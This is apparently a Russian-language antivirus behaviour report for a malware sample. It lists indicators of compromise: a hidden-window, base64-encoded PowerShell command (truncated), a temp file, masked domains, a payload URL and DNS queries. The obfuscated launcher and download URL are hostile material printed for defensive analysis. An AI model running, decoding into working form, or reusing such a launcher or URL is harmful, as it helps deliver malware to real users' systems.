Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAGUAVAAtAEkAdABFAE0AIAAgACgAIgB2AEEAUgAiACsAIgBJACIAKwAiAEEAQgBMAGUAOgAiACsAIgBEAEEAVgBGAHAAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADUAfQB7ADMAfQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\643051.cvr
- 'mo#####.map.fastly.net':443
- 'sa####apparel.com':80
- 'sa####apparel.com':443
- 'sa##co.com':443
- 'al###natul.com':443
- http://www.sa####apparel.com/wp-content_old/whE/
- '34.##9.100.209':443
- 'sa####apparel.com':443
- 'sa##co.com':443
- 'al###natul.com':443
- DNS ASK mo#####.map.fastly.net
- DNS ASK sa####apparel.com
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK te###rpit.xyz
- DNS ASK sa##co.com
- DNS ASK be####rowser.top
- DNS ASK al###natul.com
- DNS ASK ra###ampi.com
- DNS ASK in######vepropertiesltd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAGUAVAAtAEkAdABFAE0AIAAgACgAIgB2AEEAUgAiACsAIgBJACIAKwAiAEEAQgBMAGUAOgAiACsAIgBEAEEAVgBGAHAAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADUAfQB7ADMAfQ... (со скрытым окном)